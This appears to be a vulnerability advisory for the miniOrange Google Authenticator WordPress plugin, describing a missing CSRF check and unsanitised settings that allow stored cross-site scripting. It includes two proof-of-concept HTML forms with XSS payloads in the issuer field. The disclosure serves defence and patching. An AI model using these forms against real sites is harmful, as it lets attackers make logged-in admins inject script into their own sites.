miniOrange Google Authenticator < 1.0.5 - CSRF to Stored Cross-Site Scripting

2022-06-0600:00:00

Niraj Mahajan

0.001 Low

EPSS

Percentile

26.0%

JSON

The plugin does not have CSRF check when saving its settings, and does not sanitise as well as escape them, allowing attackers to make a logged in admin change them and perform Cross-Site Scripting attacks

v < 1.0.4

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=mo_view_page" method="POST">
      <input type="hidden" name="option" value="mo2f_gauth_appname" />
      <input type="hidden" name="mo2f_gauth_issuer" value='"><img src onerror=alert(/XSS/)>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

v < 1.0.5
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=mo_view_page" method="POST">
      <input type="hidden" name="option" value="mo2f_gauth_appname" />
      <input type="hidden" name="mo2f_gauth_issuer" value='" style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

0.001 Low

EPSS

Percentile

26.0%

JSON

Related for WPEX-ID:FEFC1411-594D-465B-AEB9-78C141B23762